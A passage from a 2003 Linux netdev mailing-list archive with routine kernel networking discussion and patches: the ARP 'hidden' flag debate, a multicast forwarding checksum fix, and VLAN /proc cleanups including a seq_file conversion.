/dev Warning: unable to open an initial console. Adding Swap: 530080k swap-space (priority -1) EXT3 FS 2.4-0.9.19, 19 August 2002 on sd(8,2), internal journal IPv6 v0.8 for NET4.0 IPv6 over IPv4 tunneling driver divert: not allocating divert_blk for non-ethernet device sit0 kjournald starting. Commit interval 5 seconds EXT3 FS 2.4-0.9.19, 19 August 2002 on sd(8,5), internal journal EXT3-fs: mounted filesystem with ordered data mode. divert: not allocating divert_blk for non-ethernet device xs26 eth0: Link is up using internal transceiver at 100Mb/s, Full Duplex. Best Regards, -- Jan Oravec XS26 coordinator 6COM s.r.o. 'Access to IPv6' http://www.6com.sk http://www.xs26.net From kernel@theoesters.com Mon Jul 28 10:10:00 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 28 Jul 2003 10:10:06 -0700 (PDT) Received: from mail.theoesters.com (nobody@adsl-67-120-171-161.dsl.lsan03.pacbell.net [67.120.171.161]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6SH9xFl007875 for ; Mon, 28 Jul 2003 10:10:00 -0700 Received: (qmail 13492 invoked by uid 0); 28 Jul 2003 17:09:59 -0000 Date: Mon, 28 Jul 2003 10:09:59 -0700 From: Phil Oester To: Carlos Velasco Cc: "David S. Miller" , marcelo@conectiva.com.br, netdev@oss.sgi.com, linux-net@vger.kernel.org, torvalds@osdl.org, linux-kernel@vger.kernel.org Subject: Re: [2.4 PATCH] bugfix: ARP respond on all devices Message-ID: <20030728100959.A13335@ns1.theoesters.com> References: <20030727165831.05904792.davem@redhat.com> <200307280211590888.10957DD9@192.168.128.16> <20030727171403.6e5bcc58.davem@redhat.com> <200307280235210263.10AADFF8@192.168.128.16> <20030727173600.475d95fb.davem@redhat.com> <200307280253090799.10BB2DF0@192.168.128.16> <20030727175557.1d624b36.davem@redhat.com> <200307280323020667.10D68954@192.168.128.16> <20030727183547.784b6ab5.davem@redhat.com> <200307281243530385.12D80171@192.168.128.16> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5.1i In-Reply-To: <200307281243530385.12D80171@192.168.128.16>; from carlosev@newipnet.com on Mon, Jul 28, 2003 at 12:43:53PM +0200 X-archive-position: 4346 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: kernel@theoesters.com Precedence: bulk X-list: netdev What I think David fails to realize is that in the real world, people use the hidden patch on a regular basis. It is the simplest way to achieve what we want to in a server farm consisting of hundreds of servers. It also involves the least overhead. And NO - I do not use IPVS. I use one of the many hardware based loadbalancers which work flawlessly with the hidden flag. Those in ivory towers can pontificate endlessly about how one 'should' fix the arp problem. Those in the trenches will do it the easy way. Phil Oester > On 27/07/2003 at 18:35 David S. Miller wrote: > > >I don't deny that it fixes your problem, that is not what > >we're talking about. We're talking about how one should > >fix the problem, and I'm trying to show you why "hidden" > >patch is not the answer to that. From WWending@oerlikon.ca Mon Jul 28 10:20:34 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 28 Jul 2003 10:20:39 -0700 (PDT) Received: from mail.oerlikon.ca ([207.236.123.4]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6SHKWFl008486 for ; Mon, 28 Jul 2003 10:20:33 -0700 X-MimeOLE: Produced By Microsoft Exchange V6.0.6249.0 content-class: urn:content-classes:message MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Subject: multicast IP datagram forwarding bug and fix Date: Mon, 28 Jul 2003 13:20:31 -0400 Message-ID: X-MS-Has-Attach: X-MS-TNEF-Correlator: Thread-Topic: multicast IP datagram forwarding bug and fix Thread-Index: AcNVKzM2n6nZ9yf3QoKw41OAI12Z9wAATw1w From: "Weng, Wending" To: Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from quoted-printable to 8bit by oss.sgi.com id h6SHKWFl008486 X-archive-position: 4347 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: WWending@oerlikon.ca Precedence: bulk X-list: netdev > Hi, > > LINUX doesn't forward multicast IP datagram if it has option(s), there is is a bug in the module ipmr.c, function > ipmr_forward_finish, below is the current version of this function: > > static inline int ipmr_forward_finish(struct sk_buff *skb) > { > struct dst_entry *dst = skb->dst; > > if (skb->len <= dst->pmtu) > return dst->output(skb); > else > return ip_fragment(skb, dst->output); > } > > it forgets to recalculate the checksum in case the option is modified. > > The following code works properly: > > static inline int ipmr_forward_finish(struct sk_buff *skb) > { > struct dst_entry *dst = skb->dst; > > ip_forward_options (skb); /* this line recalculates checksum if needed. */ > > if (skb->len <= dst->pmtu) > return dst->output(skb); > else > return ip_fragment(skb, dst->output); > } > > Wending Weng From bloemsaa@xs4all.nl Mon Jul 28 11:56:28 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 28 Jul 2003 11:56:36 -0700 (PDT) Received: from smtpzilla3.xs4all.nl (smtpzilla3.xs4all.nl [194.109.127.139]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6SIuRFl014495 for ; Mon, 28 Jul 2003 11:56:28 -0700 Received: from llewella (vialle.xs4all.nl [213.84.6.25]) by smtpzilla3.xs4all.nl (8.12.9/8.12.9) with SMTP id h6SIuNMc022284; Mon, 28 Jul 2003 20:56:24 +0200 (CEST) Message-ID: <00bd01c35539$f42491c0$cd01a8c0@llewella> From: "Bas Bloemsaat" To: "Carlos Velasco" Cc: , , References: <20030727165831.05904792.davem@redhat.com> <200307280211590888.10957DD9@192.168.128.16> <20030727171403.6e5bcc58.davem@redhat.com> <200307280235210263.10AADFF8@192.168.128.16> <20030727173600.475d95fb.davem@redhat.com> <200307280253090799.10BB2DF0@192.168.128.16> <20030727175557.1d624b36.davem@redhat.com> <200307280323020667.10D68954@192.168.128.16> <20030727183547.784b6ab5.davem@redhat.com> <200307281243530385.12D80171@192.168.128.16> <20030728100959.A13335@ns1.theoesters.com> Subject: Re: [2.4 PATCH] bugfix: ARP respond on all devices Date: Mon, 28 Jul 2003 20:56:28 +0200 X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2800.1158 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1165 X-archive-position: 4348 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: bloemsaa@xs4all.nl Precedence: bulk X-list: netdev First of all, Im sorry I started this. It was a genuine error on my side, to assume I stumbled on a bug, while it is in fact a hotly debated 'feature'. I did google for it, but must have missed it, it would have saved my weekend. I didn't want to (re)start a religious war. Maybe we should let it rest for a bit, until we have something to discuss about. Right now, I've have the idea that people are talking about slightly different things. > What I think David fails to realize is that in the real world, people > use the hidden patch on a regular basis. It is the simplest way to > achieve what we want to in a server farm consisting of hundreds of > servers. It also involves the least overhead. Me myself. I've downloaded it, and use it now. It works fine for me and I don't see any problems. But I do not oversee the whole picture, and I don't think anybody fully understands the other camp's objections. David, I hope that you will explain your side of the story, or maybe point to a webpage where it is explained clearly. I still have no idea as to what your objections are, other than that in the past, another choice was made to do things. Regards, Bas From shemminger@osdl.org Mon Jul 28 14:00:00 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 28 Jul 2003 14:00:04 -0700 (PDT) Received: from mail.osdl.org (fw.osdl.org [65.172.181.6]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6SKxxFl022174 for ; Mon, 28 Jul 2003 14:00:00 -0700 Received: from dell_ss3.pdx.osdl.net (dell_ss3.pdx.osdl.net [172.20.1.60]) by mail.osdl.org (8.11.6/8.11.6) with SMTP id h6SKxmI15650; Mon, 28 Jul 2003 13:59:48 -0700 Date: Mon, 28 Jul 2003 13:59:47 -0700 From: Stephen Hemminger To: "David S. Miller" Cc: netdev@oss.sgi.com, bridge@osdl.org Subject: [PATCH] Change MAINTAINERS reference to bridge mailing list Message-Id: <20030728135947.4aa9ad06.shemminger@osdl.org> Organization: Open Source Development Lab X-Mailer: Sylpheed version 0.9.3claws (GTK+ 1.2.10; i686-pc-linux-gnu) X-Face: &@E+xe?c%:&e4D{>f1O<&U>2qwRREG5!}7R4;D<"NO^UI2mJ[eEOA2*3>(`Th.yP,VDPo9$ /`~cw![cmj~~jWe?AHY7D1S+\}5brN0k*NE?pPh_'_d>6;XGG[\KDRViCfumZT3@[ Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4349 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: shemminger@osdl.org Precedence: bulk X-list: netdev List moved to osdl.org diff -Nru a/MAINTAINERS b/MAINTAINERS --- a/MAINTAINERS Mon Jul 28 13:57:06 2003 +++ b/MAINTAINERS Mon Jul 28 13:57:06 2003 @@ -666,7 +666,7 @@ ETHERNET BRIDGE P: Stephen Hemminger M: shemminger@osdl.org -L: bridge@math.leidenuniv.nl +L: bridge@osdl.org W: http://bridge.sourceforge.net/ S: Maintained From davem@redhat.com Mon Jul 28 14:02:48 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 28 Jul 2003 14:02:54 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6SL2mFl022628 for ; Mon, 28 Jul 2003 14:02:48 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id NAA30236; Mon, 28 Jul 2003 13:59:38 -0700 Date: Mon, 28 Jul 2003 13:59:38 -0700 From: "David S. Miller" To: Stephen Hemminger Cc: netdev@oss.sgi.com, bridge@osdl.org Subject: Re: [PATCH] Change MAINTAINERS reference to bridge mailing list Message-Id: <20030728135938.38188485.davem@redhat.com> In-Reply-To: <20030728135947.4aa9ad06.shemminger@osdl.org> References: <20030728135947.4aa9ad06.shemminger@osdl.org> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4350 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Mon, 28 Jul 2003 13:59:47 -0700 Stephen Hemminger wrote: > List moved to osdl.org Applied, thanks. From shemminger@osdl.org Mon Jul 28 15:18:13 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 28 Jul 2003 15:18:17 -0700 (PDT) Received: from mail.osdl.org (fw.osdl.org [65.172.181.6]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6SMICFl027937 for ; Mon, 28 Jul 2003 15:18:13 -0700 Received: from dell_ss3.pdx.osdl.net (dell_ss3.pdx.osdl.net [172.20.1.60]) by mail.osdl.org (8.11.6/8.11.6) with SMTP id h6SMHjI03666; Mon, 28 Jul 2003 15:17:45 -0700 Date: Mon, 28 Jul 2003 15:17:45 -0700 From: Stephen Hemminger To: Ben Greear , "David S. Miller" Cc: "Linux 802.1Q VLAN" , netdev@oss.sgi.com Subject: [PATCH] typo in vlan debug code Message-Id: <20030728151745.54123f45.shemminger@osdl.org> Organization: Open Source Development Lab X-Mailer: Sylpheed version 0.9.3claws (GTK+ 1.2.10; i686-pc-linux-gnu) X-Face: &@E+xe?c%:&e4D{>f1O<&U>2qwRREG5!}7R4;D<"NO^UI2mJ[eEOA2*3>(`Th.yP,VDPo9$ /`~cw![cmj~~jWe?AHY7D1S+\}5brN0k*NE?pPh_'_d>6;XGG[\KDRViCfumZT3@[ Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4351 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: shemminger@osdl.org Precedence: bulk X-list: netdev VLAN won't build with debug enabled. diff -Nru a/net/8021q/vlan_dev.c b/net/8021q/vlan_dev.c --- a/net/8021q/vlan_dev.c Mon Jul 28 15:05:34 2003 +++ b/net/8021q/vlan_dev.c Mon Jul 28 15:05:34 2003 @@ -170,7 +170,7 @@ #ifdef VLAN_DEBUG printk(VLAN_DBG "%s: dropping skb: %p because came in on wrong device, dev: %s real_dev: %s, skb_dev: %s\n", - __FUNCTION__ skb, dev->name, + __FUNCTION__, skb, dev->name, VLAN_DEV_INFO(skb->dev)->real_dev->name, skb->dev->name); #endif From shemminger@osdl.org Mon Jul 28 15:21:28 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 28 Jul 2003 15:21:32 -0700 (PDT) Received: from mail.osdl.org (fw.osdl.org [65.172.181.6]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6SMLRFl028419 for ; Mon, 28 Jul 2003 15:21:27 -0700 Received: from dell_ss3.pdx.osdl.net (dell_ss3.pdx.osdl.net [172.20.1.60]) by mail.osdl.org (8.11.6/8.11.6) with SMTP id h6SMLFI04305; Mon, 28 Jul 2003 15:21:15 -0700 Date: Mon, 28 Jul 2003 15:21:14 -0700 From: Stephen Hemminger To: Ben Greear , "David S. Miller" Cc: "Linux 802.1Q VLAN" , netdev@oss.sgi.com Subject: [PATCH] Vlan convert stubs to no-ops Message-Id: <20030728152114.02a10f4e.shemminger@osdl.org> Organization: Open Source Development Lab X-Mailer: Sylpheed version 0.9.3claws (GTK+ 1.2.10; i686-pc-linux-gnu) X-Face: &@E+xe?c%:&e4D{>f1O<&U>2qwRREG5!}7R4;D<"NO^UI2mJ[eEOA2*3>(`Th.yP,VDPo9$ /`~cw![cmj~~jWe?AHY7D1S+\}5brN0k*NE?pPh_'_d>6;XGG[\KDRViCfumZT3@[ Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4352 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: shemminger@osdl.org Precedence: bulk X-list: netdev When building without /proc, the interfaces can be converted to no-ops (very minor code savings). Patch for 2.6.0-test2 diff -Nru a/net/8021q/Makefile b/net/8021q/Makefile --- a/net/8021q/Makefile Mon Jul 28 15:05:58 2003 +++ b/net/8021q/Makefile Mon Jul 28 15:05:58 2003 @@ -4,4 +4,9 @@ obj-$(CONFIG_VLAN_8021Q) += 8021q.o -8021q-objs := vlan.o vlanproc.o vlan_dev.o +8021q-objs := vlan.o vlan_dev.o + +ifeq ($(CONFIG_PROC_FS),y) +8021q-objs += vlanproc.o +endif + diff -Nru a/net/8021q/vlanproc.c b/net/8021q/vlanproc.c --- a/net/8021q/vlanproc.c Mon Jul 28 15:05:58 2003 +++ b/net/8021q/vlanproc.c Mon Jul 28 15:05:58 2003 @@ -38,8 +38,6 @@ /****** Function Prototypes *************************************************/ -#ifdef CONFIG_PROC_FS - /* Proc filesystem interface */ static ssize_t vlan_proc_read(struct file *file, char *buf, size_t count, loff_t *ppos); @@ -438,32 +436,3 @@ return cnt; } - -#else /* No CONFIG_PROC_FS */ - -/* - * No /proc - output stubs - */ - -int __init vlan_proc_init (void) -{ - return 0; -} - -void vlan_proc_cleanup(void) -{ - return; -} - - -int vlan_proc_add_dev(struct net_device *vlandev) -{ - return 0; -} - -int vlan_proc_rem_dev(struct net_device *vlandev) -{ - return 0; -} - -#endif /* No CONFIG_PROC_FS */ diff -Nru a/net/8021q/vlanproc.h b/net/8021q/vlanproc.h --- a/net/8021q/vlanproc.h Mon Jul 28 15:05:58 2003 +++ b/net/8021q/vlanproc.h Mon Jul 28 15:05:58 2003 @@ -1,6 +1,7 @@ #ifndef __BEN_VLAN_PROC_INC__ #define __BEN_VLAN_PROC_INC__ +#ifdef CONFIG_PROC_FS int vlan_proc_init(void); int vlan_proc_rem_dev(struct net_device *vlandev); @@ -8,5 +9,14 @@ void vlan_proc_cleanup (void); #define VLAN_PROC_BUFSZ (4096) /* buffer size for printing proc info */ + +#else /* No CONFIG_PROC_FS */ + +#define vlan_proc_init() (0) +#define vlan_proc_cleanup() do {} while(0) +#define vlan_proc_add_dev(dev) ((void)(dev), 0) +#define vlan_proc_rem_dev(dev) ((void)(dev), 0) + +#endif #endif /* !(__BEN_VLAN_PROC_INC__) */ From shemminger@osdl.org Mon Jul 28 15:30:40 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 28 Jul 2003 15:31:05 -0700 (PDT) Received: from mail.osdl.org (fw.osdl.org [65.172.181.6]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6SMUbFl029460 for ; Mon, 28 Jul 2003 15:30:38 -0700 Received: from dell_ss3.pdx.osdl.net (dell_ss3.pdx.osdl.net [172.20.1.60]) by mail.osdl.org (8.11.6/8.11.6) with SMTP id h6SMUOI05545; Mon, 28 Jul 2003 15:30:24 -0700 Date: Mon, 28 Jul 2003 15:30:24 -0700 From: Stephen Hemminger To: Ben Greear , "David S. Miller" , "Linux 802.1Q VLAN" , netdev@oss.sgi.com Subject: [PATCH] convert VLAN to use seq_file for /proc Message-Id: <20030728153024.6b1d7cde.shemminger@osdl.org> Organization: Open Source Development Lab X-Mailer: Sylpheed version 0.9.3claws (GTK+ 1.2.10; i686-pc-linux-gnu) X-Face: &@E+xe?c%:&e4D{>f1O<&U>2qwRREG5!}7R4;D<"NO^UI2mJ[eEOA2*3>(`Th.yP,VDPo9$ /`~cw![cmj~~jWe?AHY7D1S+\}5brN0k*NE?pPh_'_d>6;XGG[\KDRViCfumZT3@[ Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4353 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: shemminger@osdl.org Precedence: bulk X-list: netdev Use seq_file interface for smaller, simpler, safer code in /proc. Output format is the same. Patch for 2.6.0-test2 with earlier proc patches diff -Nru a/net/8021q/vlanproc.c b/net/8021q/vlanproc.c --- a/net/8021q/vlanproc.c Mon Jul 28 15:28:36 2003 +++ b/net/8021q/vlanproc.c Mon Jul 28 15:28:36 2003 @@ -30,6 +30,7 @@ #include /* copy_to_user */ #include #include +#include #include #include #include @@ -38,28 +39,28 @@ /****** Function Prototypes *************************************************/ -/* Proc filesystem interface */ -static ssize_t vlan_proc_read(struct file *file, char *buf, size_t count, - loff_t *ppos); - /* Methods for preparing data for reading proc entries */ - -static int vlan_config_get_info(char *buf, char **start, off_t offs, int len); -static int vlandev_get_info(char *buf, char **start, off_t offs, int len); +static int vlan_seq_show(struct seq_file *seq, void *v); +static void *vlan_seq_start(struct seq_file *seq, loff_t *pos); +static void *vlan_seq_next(struct seq_file *seq, void *v, loff_t *pos); +static void vlan_seq_stop(struct seq_file *seq, void *); +static int vlandev_seq_show(struct seq_file *seq, void *v); /* Miscellaneous */ +#define SEQ_START_TOKEN ((void *) 1) + /* * Global Data */ + /* * Names of the proc directory entries */ -static char name_root[] = "vlan"; -static char name_conf[] = "config"; -static char term_msg[] = "***KERNEL: Out of buffer space!***\n"; +static const char name_root[] = "vlan"; +static const char name_conf[] = "config"; /* * Structures for interfacing with the /proc filesystem. @@ -73,20 +74,41 @@ * Generic /proc/net/vlan/ file and inode operations */ +static struct seq_operations vlan_seq_ops = { + .start = vlan_seq_start, + .next = vlan_seq_next, + .stop = vlan_seq_stop, + .show = vlan_seq_show, +}; + +static int vlan_seq_open(struct inode *inode, struct file *file) +{ + return seq_open(file, &vlan_seq_ops); +} + static struct file_operations vlan_fops = { - .owner = THIS_MODULE, - .read = vlan_proc_read, - .ioctl = NULL, /* vlan_proc_ioctl */ + .owner = THIS_MODULE, + .open = vlan_seq_open, + .read = seq_read, + .llseek = seq_lseek, + .release = seq_release, }; /* * /proc/net/vlan/ file and inode operations */ +static int vlandev_seq_open(struct inode *inode, struct file *file) +{ + return single_open(file, vlandev_seq_show, PDE(inode)->data); +} + static struct file_operations vlandev_fops = { .owner = THIS_MODULE, - .read = vlan_proc_read, - .ioctl =NULL, /* vlan_proc_ioctl */ + .open = vlandev_seq_open, + .read = seq_read, + .llseek = seq_lseek, + .release = single_release, }; /* @@ -106,8 +128,12 @@ static struct proc_dir_entry *proc_vlan_conf; /* Strings */ -static char conf_hdr[] = "VLAN Dev name | VLAN ID\n"; - +static const char *vlan_name_type_str[VLAN_NAME_TYPE_HIGHEST] = { + [VLAN_NAME_TYPE_RAW_PLUS_VID] = "VLAN_NAME_TYPE_RAW_PLUS_VID", + [VLAN_NAME_TYPE_PLUS_VID_NO_PAD] = "VLAN_NAME_TYPE_PLUS_VID_NO_PAD", + [VLAN_NAME_TYPE_RAW_PLUS_VID_NO_PAD]= "VLAN_NAME_TYPE_RAW_PLUS_VID_NO_PAD", + [VLAN_NAME_TYPE_PLUS_VID] = "VLAN_NAME_TYPE_PLUS_VID", +}; /* * Interface functions */ @@ -142,7 +168,6 @@ proc_vlan_dir); if (proc_vlan_conf) { proc_vlan_conf->proc_fops = &vlan_fops; - proc_vlan_conf->get_info = vlan_config_get_info; return 0; } } @@ -172,7 +197,6 @@ return -ENOBUFS; dev_info->dent->proc_fops = &vlandev_fops; - dev_info->dent->get_info = &vlandev_get_info; dev_info->dent->data = vlandev; #ifdef VLAN_DEBUG @@ -187,6 +211,7 @@ */ void vlan_proc_rem_dev(struct net_device *vlandev) { + #ifdef VLAN_DEBUG printk(VLAN_DBG __FUNCTION__ ": dev: %p\n", vlandev); #endif @@ -201,185 +226,103 @@ /****** Proc filesystem entry points ****************************************/ /* - * Read VLAN proc directory entry. - * This is universal routine for reading all entries in /proc/net/vlan - * directory. Each directory entry contains a pointer to the 'method' for - * preparing data for that entry. - * o verify arguments - * o allocate kernel buffer - * o call get_info() to prepare data - * o copy data to user space - * o release kernel buffer - * - * Return: number of bytes copied to user space (0, if no data) - * <0 error - */ -static ssize_t vlan_proc_read(struct file *file, char *buf, - size_t count, loff_t *ppos) -{ - struct inode *inode = file->f_dentry->d_inode; - struct proc_dir_entry *dent; - char *page; - int pos, offs, len; + * The following few functions build the content of /proc/net/vlan/config + */ - if (count <= 0) - return 0; +/* starting at dev, find a VLAN device */ +struct net_device *vlan_skip(struct net_device *dev) +{ + while (dev && !(dev->priv_flags & IFF_802_1Q_VLAN)) + dev = dev->next; - dent = PDE(inode); - if ((dent == NULL) || (dent->get_info == NULL)) - return 0; + return dev; +} - page = kmalloc(VLAN_PROC_BUFSZ, GFP_KERNEL); - VLAN_MEM_DBG("page malloc, addr: %p size: %i\n", - page, VLAN_PROC_BUFSZ); +/* start read of /proc/net/vlan/config */ +static void *vlan_seq_start(struct seq_file *seq, loff_t *pos) +{ + struct net_device *dev; + loff_t i = 1; - if (page == NULL) - return -ENOBUFS; + read_lock(&dev_base_lock); - pos = dent->get_info(page, dent->data, 0, 0); - offs = file->f_pos; - if (offs < pos) { - len = min_t(int, pos - offs, count); - if (copy_to_user(buf, (page + offs), len)) { - kfree(page); - return -EFAULT; - } + if (*pos == 0) + return SEQ_START_TOKEN; + + for (dev = vlan_skip(dev_base); dev && i < *pos; + dev = vlan_skip(dev->next), ++i); + + return (i == *pos) ? dev : NULL; +} - file->f_pos += len; - } else { - len = 0; - } +static void *vlan_seq_next(struct seq_file *seq, void *v, loff_t *pos) +{ + ++*pos; - kfree(page); - VLAN_FMEM_DBG("page free, addr: %p\n", page); - return len; + return vlan_skip((v == SEQ_START_TOKEN) + ? dev_base + : ((struct net_device *)v)->next); } -/* - * The following few functions build the content of /proc/net/vlan/config - */ +static void vlan_seq_stop(struct seq_file *seq, void *v) +{ + read_unlock(&dev_base_lock); +} -static int vlan_proc_get_vlan_info(char* buf, unsigned int cnt) +static int vlan_seq_show(struct seq_file *seq, void *v) { - struct net_device *vlandev = NULL; - struct vlan_group *grp = NULL; - int h, i; - char *nm_type = NULL; - struct vlan_dev_info *dev_info = NULL; + if (v == SEQ_START_TOKEN) { + const char *nmtype = NULL; -#ifdef VLAN_DEBUG - printk(VLAN_DBG __FUNCTION__ ": cnt == %i\n", cnt); -#endif + seq_puts(seq, "VLAN Dev name | VLAN ID\n"); - if (vlan_name_type == VLAN_NAME_TYPE_RAW_PLUS_VID) { - nm_type = "VLAN_NAME_TYPE_RAW_PLUS_VID"; - } else if (vlan_name_type == VLAN_NAME_TYPE_PLUS_VID_NO_PAD) { - nm_type = "VLAN_NAME_TYPE_PLUS_VID_NO_PAD"; - } else if (vlan_name_type == VLAN_NAME_TYPE_RAW_PLUS_VID_NO_PAD) { - nm_type = "VLAN_NAME_TYPE_RAW_PLUS_VID_NO_PAD"; - } else if (vlan_name_type == VLAN_NAME_TYPE_PLUS_VID) { - nm_type = "VLAN_NAME_TYPE_PLUS_VID"; - } else { - nm_type = "UNKNOWN"; - } + if (vlan_name_type < ARRAY_SIZE(vlan_name_type_str)) + nmtype = vlan_name_type_str[vlan_name_type]; - cnt += sprintf(buf + cnt, "Name-Type: %s\n", nm_type); + seq_printf(seq, "Name-Type: %s\n", + nmtype ? nmtype : "UNKNOWN" ); + } else { + const struct net_device *vlandev = v; + const struct vlan_dev_info *dev_info = VLAN_DEV_INFO(vlandev); - spin_lock_bh(&vlan_group_lock); - for (h = 0; h < VLAN_GRP_HASH_SIZE; h++) { - for (grp = vlan_group_hash[h]; grp != NULL; grp = grp->next) { - for (i = 0; i < VLAN_GROUP_ARRAY_LEN; i++) { - vlandev = grp->vlan_devices[i]; - if (!vlandev) - continue; - - if ((cnt + 100) > VLAN_PROC_BUFSZ) { - if ((cnt+strlen(term_msg)) < VLAN_PROC_BUFSZ) - cnt += sprintf(buf+cnt, "%s", term_msg); - - goto out; - } - - dev_info = VLAN_DEV_INFO(vlandev); - cnt += sprintf(buf + cnt, "%-15s| %d | %s\n", - vlandev->name, - dev_info->vlan_id, - dev_info->real_dev->name); - } - } + seq_printf(seq, "%-15s| %d | %s\n", vlandev->name, + dev_info->vlan_id, dev_info->real_dev->name); } -out: - spin_unlock_bh(&vlan_group_lock); - - return cnt; + return 0; } -/* - * Prepare data for reading 'Config' entry. - * Return length of data. - */ - -static int vlan_config_get_info(char *buf, char **start, - off_t offs, int len) +static int vlandev_seq_show(struct seq_file *seq, void *offset) { - strcpy(buf, conf_hdr); - return vlan_proc_get_vlan_info(buf, (unsigned int)(strlen(conf_hdr))); -} - -/* - * Prepare data for reading entry. - * Return length of data. - * - * On entry, the 'start' argument will contain a pointer to VLAN device - * data space. - */ - -static int vlandev_get_info(char *buf, char **start, - off_t offs, int len) -{ - struct net_device *vlandev = (void *) start; - struct net_device_stats *stats = NULL; - struct vlan_dev_info *dev_info = NULL; - struct vlan_priority_tci_mapping *mp; - int cnt = 0; + struct net_device *vlandev = (struct net_device *) seq->private; + const struct vlan_dev_info *dev_info = VLAN_DEV_INFO(vlandev); + struct net_device_stats *stats; + static const char *fmt = "%30s %12lu\n"; int i; if ((vlandev == NULL) || (!(vlandev->priv_flags & IFF_802_1Q_VLAN))) return 0; - dev_info = VLAN_DEV_INFO(vlandev); - - cnt += sprintf(buf + cnt, "%s VID: %d REORDER_HDR: %i dev->priv_flags: %hx\n", + seq_printf(seq, "%s VID: %d REORDER_HDR: %i dev->priv_flags: %hx\n", vlandev->name, dev_info->vlan_id, (int)(dev_info->flags & 1), vlandev->priv_flags); - stats = vlan_dev_get_stats(vlandev); - - cnt += sprintf(buf + cnt, "%30s: %12lu\n", - "total frames received", stats->rx_packets); - - cnt += sprintf(buf + cnt, "%30s: %12lu\n", - "total bytes received", stats->rx_bytes); - - cnt += sprintf(buf + cnt, "%30s: %12lu\n", - "Broadcast/Multicast Rcvd", stats->multicast); - - cnt += sprintf(buf + cnt, "\n%30s: %12lu\n", - "total frames transmitted", stats->tx_packets); - - cnt += sprintf(buf + cnt, "%30s: %12lu\n", - "total bytes transmitted", stats->tx_bytes); - - cnt += sprintf(buf + cnt, "%30s: %12lu\n", - "total headroom inc", dev_info->cnt_inc_headroom_on_tx); - - cnt += sprintf(buf + cnt, "%30s: %12lu\n", - "total encap on xmit", dev_info->cnt_encap_on_xmit); - cnt += sprintf(buf + cnt, "Device: %s", dev_info->real_dev->name); + stats = vlan_dev_get_stats(vlandev); + seq_printf(seq, fmt, "total frames received", stats->rx_packets); + seq_printf(seq, fmt, "total bytes received", stats->rx_bytes); + seq_printf(seq, fmt, "Broadcast/Multicast Rcvd", stats->multicast); + seq_puts(seq, "\n"); + seq_printf(seq, fmt, "total frames transmitted", stats->tx_packets); + seq_printf(seq, fmt, "total bytes transmitted", stats->tx_bytes); + seq_printf(seq, fmt, "total headroom inc", + dev_info->cnt_inc_headroom_on_tx); + seq_printf(seq, fmt, "total encap on xmit", + dev_info->cnt_encap_on_xmit); + seq_printf(seq, "Device: %s", dev_info->real_dev->name); /* now show all PRIORITY mappings relating to this VLAN */ - cnt += sprintf(buf + cnt, "\nINGRESS priority mappings: 0:%lu 1:%lu 2:%lu 3:%lu 4:%lu 5:%lu 6:%lu 7:%lu\n", + seq_printf(seq, + "\nINGRESS priority mappings: 0:%lu 1:%lu 2:%lu 3:%lu 4:%lu 5:%lu 6:%lu 7:%lu\n", dev_info->ingress_priority_map[0], dev_info->ingress_priority_map[1], dev_info->ingress_priority_map[2], @@ -389,38 +332,17 @@ dev_info->ingress_priority_map[6], dev_info->ingress_priority_map[7]); - if ((cnt + 100) > VLAN_PROC_BUFSZ) { - if ((cnt + strlen(term_msg)) >= VLAN_PROC_BUFSZ) { - /* should never get here */ - return cnt; - } else { - cnt += sprintf(buf + 